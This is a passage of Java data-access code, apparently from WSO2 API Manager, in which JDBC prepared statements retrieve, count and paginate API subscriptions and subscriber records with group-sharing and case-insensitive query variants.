SQLConstants.REMOVE_ALL_SUBSCRIPTIONS_SQL; ps = conn.prepareStatement(sqlQuery); ps.setInt(1, apiId); ps.executeUpdate(); conn.commit(); } catch (SQLException e) { if (conn != null) { try { conn.rollback(); } catch (SQLException e1) { log.error("Failed to rollback remove all subscription ", e1); } } handleException("Failed to remove all subscriptions data ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, null); } } public String getSubscriptionStatusById(int subscriptionId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; String subscriptionStatus = null; try { conn = APIMgtDBUtil.getConnection(); String getApiQuery = SQLConstants.GET_SUBSCRIPTION_STATUS_BY_ID_SQL; ps = conn.prepareStatement(getApiQuery); ps.setInt(1, subscriptionId); resultSet = ps.executeQuery(); if (resultSet.next()) { subscriptionStatus = resultSet.getString("SUB_STATUS"); } return subscriptionStatus; } catch (SQLException e) { handleException("Failed to retrieve subscription status", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return null; } /** * returns the SubscribedAPI object which is related to the subscriptionId * * @param subscriptionId subscription id * @return {@link SubscribedAPI} Object which contains the subscribed API information. * @throws APIManagementException */ public SubscribedAPI getSubscriptionById(int subscriptionId) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String getSubscriptionQuery = SQLConstants.GET_SUBSCRIPTION_BY_ID_SQL; ps = conn.prepareStatement(getSubscriptionQuery); ps.setInt(1, subscriptionId); resultSet = ps.executeQuery(); SubscribedAPI subscribedAPI = null; if (resultSet.next()) { int applicationId = resultSet.getInt("APPLICATION_ID"); Application application = getApplicationById(applicationId); if(!StringUtils.isEmpty(resultSet.getString("API_NAME"))) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(resultSet.getString ("API_PROVIDER")), resultSet.getString("API_NAME"), resultSet.getString("API_VERSION")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiIdentifier); } if(!StringUtils.isEmpty(resultSet.getString("API_PRODUCT_NAME"))) { APIProductIdentifier apiProductIdentifier = new APIProductIdentifier( APIUtil.replaceEmailDomain(resultSet.getString("API_PRODUCT_PROVIDER")), resultSet.getString("API_PRODUCT_NAME")); apiProductIdentifier.setUuid(resultSet.getString("PRODUCT_UUID")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiProductIdentifier); } subscribedAPI.setSubscriptionId(resultSet.getInt("SUBSCRIPTION_ID")); subscribedAPI.setSubStatus(resultSet.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(resultSet.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(resultSet.getString("TIER_ID"))); subscribedAPI.setUUID(resultSet.getString("UUID")); subscribedAPI.setApplication(application); } return subscribedAPI; } catch (SQLException e) { handleException("Failed to retrieve subscription from subscription id", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return null; } /** * returns the SubscribedAPI object which is related to the UUID * * @param uuid UUID of Application * @return {@link SubscribedAPI} Object which contains the subscribed API information. * @throws APIManagementException */ public SubscribedAPI getSubscriptionByUUID(String uuid) throws APIManagementException { Connection conn = null; ResultSet resultSet = null; PreparedStatement ps = null; try { conn = APIMgtDBUtil.getConnection(); String getSubscriptionQuery = SQLConstants.GET_SUBSCRIPTION_BY_UUID_SQL; ps = conn.prepareStatement(getSubscriptionQuery); ps.setString(1, uuid); resultSet = ps.executeQuery(); SubscribedAPI subscribedAPI = null; if (resultSet.next()) { int applicationId = resultSet.getInt("APPLICATION_ID"); Application application = getApplicationById(applicationId); if(!StringUtils.isEmpty(resultSet.getString("API_NAME"))) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(resultSet.getString ("API_PROVIDER")), resultSet.getString("API_NAME"), resultSet.getString("API_VERSION")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiIdentifier); } if(!StringUtils.isEmpty(resultSet.getString("API_PRODUCT_NAME"))) { APIProductIdentifier apiProductIdentifier = new APIProductIdentifier( APIUtil.replaceEmailDomain(resultSet.getString("API_PRODUCT_PROVIDER")), resultSet.getString("API_PRODUCT_NAME")); apiProductIdentifier.setUuid(resultSet.getString("PRODUCT_UUID")); subscribedAPI = new SubscribedAPI(application.getSubscriber(), apiProductIdentifier); } subscribedAPI.setUUID(resultSet.getString("UUID")); subscribedAPI.setSubscriptionId(resultSet.getInt("SUBSCRIPTION_ID")); subscribedAPI.setSubStatus(resultSet.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(resultSet.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(resultSet.getString("TIER_ID"))); Timestamp createdTime = resultSet.getTimestamp("CREATED_TIME"); subscribedAPI.setCreatedTime(createdTime == null ? null : String.valueOf(createdTime.getTime())); try { Timestamp updated_time = resultSet.getTimestamp("UPDATED_TIME"); subscribedAPI.setUpdatedTime( updated_time == null ? null : String.valueOf(updated_time.getTime())); } catch (SQLException e) { // fixing Timestamp issue with default value '0000-00-00 00:00:00'for existing applications created subscribedAPI.setUpdatedTime(subscribedAPI.getCreatedTime()); } subscribedAPI.setApplication(application); } return subscribedAPI; } catch (SQLException e) { handleException("Failed to retrieve subscription from subscription id", e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, resultSet); } return null; } /** * This method used tot get Subscriber from subscriberId. * * @param subscriberName id * @return Subscriber * @throws APIManagementException if failed to get Subscriber from subscriber id */ public Subscriber getSubscriber(String subscriberName) throws APIManagementException { Connection conn = null; Subscriber subscriber = null; PreparedStatement ps = null; ResultSet result = null; int tenantId = APIUtil.getTenantId(subscriberName); String sqlQuery = SQLConstants.GET_TENANT_SUBSCRIBER_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_TENANT_SUBSCRIBER_CASE_INSENSITIVE_SQL; } try { conn = APIMgtDBUtil.getConnection(); ps = conn.prepareStatement(sqlQuery); ps.setString(1, subscriberName); ps.setInt(2, tenantId); result = ps.executeQuery(); if (result.next()) { subscriber = new Subscriber(result.getString(APIConstants.SUBSCRIBER_FIELD_EMAIL_ADDRESS)); subscriber.setEmail(result.getString("EMAIL_ADDRESS")); subscriber.setId(result.getInt("SUBSCRIBER_ID")); subscriber.setName(subscriberName); subscriber.setSubscribedDate(result.getDate(APIConstants.SUBSCRIBER_FIELD_DATE_SUBSCRIBED)); subscriber.setTenantId(result.getInt("TENANT_ID")); } } catch (SQLException e) { handleException("Failed to get Subscriber for :" + subscriberName, e); } finally { APIMgtDBUtil.closeAllConnections(ps, conn, result); } return subscriber; } public Set<APIIdentifier> getAPIByConsumerKey(String accessToken) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String getAPISql = SQLConstants.GET_API_BY_CONSUMER_KEY_SQL; Set<APIIdentifier> apiSet = new HashSet<APIIdentifier>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getAPISql); String encryptedAccessToken = APIUtil.encryptToken(accessToken); ps.setString(1, encryptedAccessToken); result = ps.executeQuery(); while (result.next()) { apiSet.add(new APIIdentifier(result.getString("API_PROVIDER"), result.getString("API_NAME"), result .getString("API_VERSION"))); } } catch (SQLException e) { handleException("Failed to get API ID for token: " + accessToken, e); } catch (CryptoException e) { handleException("Failed to get API ID for token: " + accessToken, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiSet; } /** * This method returns the set of APIs for given subscriber, subscribed under the specified application. * * @param subscriber subscriber * @param applicationName Application Name * @return Set<API> * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get SubscribedAPIs */ public Set<SubscribedAPI> getSubscribedAPIs(Subscriber subscriber, String applicationName, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_SQL; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) ))"; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIdArr[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, applicationName); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubscriptionId(result.getInt("SUBS_ID")); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setUUID(result.getString("SUB_UUID")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); application.setUUID(result.getString("APP_UUID")); subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } /** * This method returns the set of APIs for given subscriber, subscribed under the specified application. * * @param subscriber subscriber * @param applicationId Application Id * @return Set<API> * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get SubscribedAPIs */ public Set<SubscribedAPI> getSubscribedAPIsByApplicationId(Subscriber subscriber, int applicationId, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_BY_ID_SQL; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) ))"; try { connection = APIMgtDBUtil.getConnection(); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); String groupIdArr[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setInt(2, applicationId); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); int tenantId = APIUtil.getTenantId(subscriber.getName()); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubscriptionId(result.getInt("SUBS_ID")); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setUUID(result.getString("SUB_UUID")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); application.setId(result.getInt("APP_ID")); application.setOwner(result.getString("OWNER")); application.setCallbackUrl(result.getString("CALLBACK_URL")); application.setUUID(result.getString("APP_UUID")); if (multiGroupAppSharingEnabled) { application.setGroupId(getGroupId(application.getId())); } int subscriptionId = result.getInt("SUBS_ID"); Set<APIKey> apiKeys = getAPIKeysBySubscription(subscriptionId); for (APIKey key : apiKeys) { subscribedAPI.addKey(key); } subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } private Set<APIKey> getAPIKeysBySubscription(int subscriptionId) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String getKeysSql = SQLConstants.GET_API_KEY_BY_SUBSCRIPTION_SQL; Set<APIKey> apiKeys = new HashSet<APIKey>(); try { connection = APIMgtDBUtil.getConnection(); ps = connection.prepareStatement(getKeysSql); ps.setInt(1, subscriptionId); result = ps.executeQuery(); while (result.next()) { APIKey apiKey = new APIKey(); String decryptedAccessToken = APIUtil.decryptToken(result.getString("ACCESS_TOKEN")); apiKey.setAccessToken(decryptedAccessToken); apiKey.setType(result.getString("TOKEN_TYPE")); apiKeys.add(apiKey); } } catch (SQLException e) { handleException("Failed to get API keys for subscription: " + subscriptionId, e); } catch (CryptoException e) { handleException("Failed to get API keys for subscription: " + subscriptionId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return apiKeys; } public Integer getSubscriptionCount(Subscriber subscriber, String applicationName, String groupingId) throws APIManagementException { Integer subscriptionCount = 0; Connection connection = null; PreparedStatement ps = null; ResultSet result = null; int tenantId = APIUtil.getTenantId(subscriber.getName()); try { connection = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_CASE_INSENSITIVE_SQL; } String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR " + "((APP.GROUP_ID = '' OR APP.GROUP_ID IS NULL) AND SUB.USER_ID = ?)) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithUserId = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String appIdentifier; boolean hasGrouping = false; if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); sqlQuery += whereClauseWithMultiGroupId; String[] groupIdArr = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); ps.setString(1, applicationName); ps.setInt(2, tenantId); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { sqlQuery += whereClauseWithGroupId; ps = connection.prepareStatement(sqlQuery); ps.setString(1, applicationName); ps.setInt(2, tenantId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClauseWithUserId; } ps = connection.prepareStatement(sqlQuery); ps.setString(1, applicationName); ps.setInt(2, tenantId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { subscriptionCount = result.getInt("SUB_COUNT"); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptionCount; } public Integer getSubscriptionCountByApplicationId(Subscriber subscriber, int applicationId, String groupingId) throws APIManagementException { Integer subscriptionCount = 0; Connection connection = null; PreparedStatement ps = null; ResultSet result = null; int tenantId = APIUtil.getTenantId(subscriber.getName()); try { connection = APIMgtDBUtil.getConnection(); String sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_BY_APP_ID_SQL; if (forceCaseInsensitiveComparisons) { sqlQuery = SQLConstants.GET_SUBSCRIPTION_COUNT_BY_APP_ID_CASE_INSENSITIVE_SQL; } String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR " + "((APP.GROUP_ID = '' OR APP.GROUP_ID IS NULL) AND SUB.USER_ID = ?)) "; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithUserId = " AND SUB.USER_ID = ? "; String whereClauseCaseSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String appIdentifier; boolean hasGrouping = false; if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); sqlQuery += whereClauseWithMultiGroupId; String[] groupIdArr = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIdArr, 3); ps.setInt(1, applicationId); ps.setInt(2, tenantId); int paramIndex = groupIdArr.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { sqlQuery += whereClauseWithGroupId; ps = connection.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setInt(2, tenantId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseCaseSensitive; } else { sqlQuery += whereClauseWithUserId; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, applicationId); ps.setInt(2, tenantId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); while (result.next()) { subscriptionCount = result.getInt("SUB_COUNT"); } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscriptionCount; } /** * Gets the subscribed API's, by the group for the application. * * @param subscriber the subscriber subscribing for the api * @param applicationName the application to which the api's are subscribed * @param startSubIndex the start index for pagination * @param endSubIndex end index for pagination * @param groupingId the group id of the application * @return the set of subscribed API's. * @throws APIManagementException */ public Set<SubscribedAPI> getPaginatedSubscribedAPIs(Subscriber subscriber, String applicationName, int startSubIndex, int endSubIndex, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_PAGINATED_SUBSCRIBED_APIS_SQL; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseForceCaseInsensitiveComp = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) ))"; try { connection = APIMgtDBUtil.getConnection(); int tenantId = APIUtil.getTenantId(subscriber.getName()); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String groupIDArray[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIDArray, 3); ps.setInt(1, tenantId); ps.setString(2, applicationName); // dynamically seeting the parameter index int paramIndex = groupIDArray.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseForceCaseInsensitiveComp; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setString(2, applicationName); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); int index = 0; while (result.next()) { if (index >= startSubIndex && index < endSubIndex) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); if (index == endSubIndex - 1) { break; } } index++; } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } /** * Gets the subscribed API's, by the group for the application. * * @param subscriber the subscriber subscribing for the api * @param applicationId the application to which the api's are subscribed * @param startSubIndex the start index for pagination * @param endSubIndex end index for pagination * @param groupingId the group id of the application * @return the set of subscribed API's. * @throws APIManagementException */ public Set<SubscribedAPI> getPaginatedSubscribedAPIs(Subscriber subscriber, int applicationId, int startSubIndex, int endSubIndex, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; String sqlQuery = SQLConstants.GET_PAGINATED_SUBSCRIBED_APIS_BY_APP_ID_SQL; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseForceCaseInsensitiveComp = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithGroupId = " AND (APP.GROUP_ID = ? OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL)" + " AND SUB.USER_ID = ?))"; String whereClauseWithGroupIdorceCaseInsensitiveComp = " AND (APP.GROUP_ID = ?" + " OR ((APP.GROUP_ID='' OR APP.GROUP_ID IS NULL) AND LOWER(SUB.USER_ID) = LOWER(?)))"; String whereClauseWithMultiGroupId = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID FROM " + "AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( SUB.USER_ID = ? ))"; String whereClauseWithMultiGroupIdCaseInsensitive = " AND ( (APP.APPLICATION_ID IN (SELECT APPLICATION_ID " + "FROM AM_APPLICATION_GROUP_MAPPING WHERE GROUP_ID IN ($params) AND TENANT = ?)) OR ( LOWER(SUB.USER_ID) = LOWER" + "(?) ))"; try { connection = APIMgtDBUtil.getConnection(); int tenantId = APIUtil.getTenantId(subscriber.getName()); if (groupingId != null && !"null".equals(groupingId) && !groupingId.isEmpty()) { if (multiGroupAppSharingEnabled) { String tenantDomain = MultitenantUtils.getTenantDomain(subscriber.getName()); if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithMultiGroupIdCaseInsensitive; } else { sqlQuery += whereClauseWithMultiGroupId; } String groupIDArray[] = groupingId.split(","); ps = fillQueryParams(connection, sqlQuery, groupIDArray, 3); ps.setInt(1, tenantId); ps.setInt(2, applicationId); // dynamically seeting the parameter index int paramIndex = groupIDArray.length + 2; ps.setString(++paramIndex, tenantDomain); ps.setString(++paramIndex, subscriber.getName()); } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseWithGroupIdorceCaseInsensitiveComp; } else { sqlQuery += whereClauseWithGroupId; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, groupingId); ps.setString(4, subscriber.getName()); } } else { if (forceCaseInsensitiveComparisons) { sqlQuery += whereClauseForceCaseInsensitiveComp; } else { sqlQuery += whereClause; } ps = connection.prepareStatement(sqlQuery); ps.setInt(1, tenantId); ps.setInt(2, applicationId); ps.setString(3, subscriber.getName()); } result = ps.executeQuery(); int index = 0; while (result.next()) { if (index >= startSubIndex && index < endSubIndex) { APIIdentifier apiIdentifier = new APIIdentifier(APIUtil.replaceEmailDomain(result.getString ("API_PROVIDER")), result.getString("API_NAME"), result.getString("API_VERSION")); SubscribedAPI subscribedAPI = new SubscribedAPI(subscriber, apiIdentifier); subscribedAPI.setSubStatus(result.getString("SUB_STATUS")); subscribedAPI.setSubCreatedStatus(result.getString("SUBS_CREATE_STATE")); subscribedAPI.setTier(new Tier(result.getString(APIConstants.SUBSCRIPTION_FIELD_TIER_ID))); Application application = new Application(result.getString("APP_NAME"), subscriber); subscribedAPI.setApplication(application); subscribedAPIs.add(subscribedAPI); if (index == endSubIndex - 1) { break; } } index++; } } catch (SQLException e) { handleException("Failed to get SubscribedAPI of :" + subscriber.getName(), e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, result); } return subscribedAPIs; } /** * This method returns the set of APIs for given subscriber * * @param subscriber subscriber * @return Set<API> * @throws org.wso2.carbon.apimgt.api.APIManagementException if failed to get SubscribedAPIs */ public Set<SubscribedAPI> getSubscribedAPIs(Subscriber subscriber, String groupingId) throws APIManagementException { Set<SubscribedAPI> subscribedAPIs = new LinkedHashSet<SubscribedAPI>(); Connection connection = null; PreparedStatement ps = null; ResultSet result = null; //identify subscribeduser used email/ordinalusername String subscribedUserName = getLoginUserName(subscriber.getName()); subscriber.setName(subscribedUserName); String sqlQuery = SQLConstants.GET_SUBSCRIBED_APIS_OF_SUBSCRIBER_SQL; String whereClause = " AND SUB.USER_ID = ? "; String whereClauseCaseInSensitive = " AND LOWER(SUB.USER_ID) = LOWER(?) "; String whereClauseWithGroupId = " AND 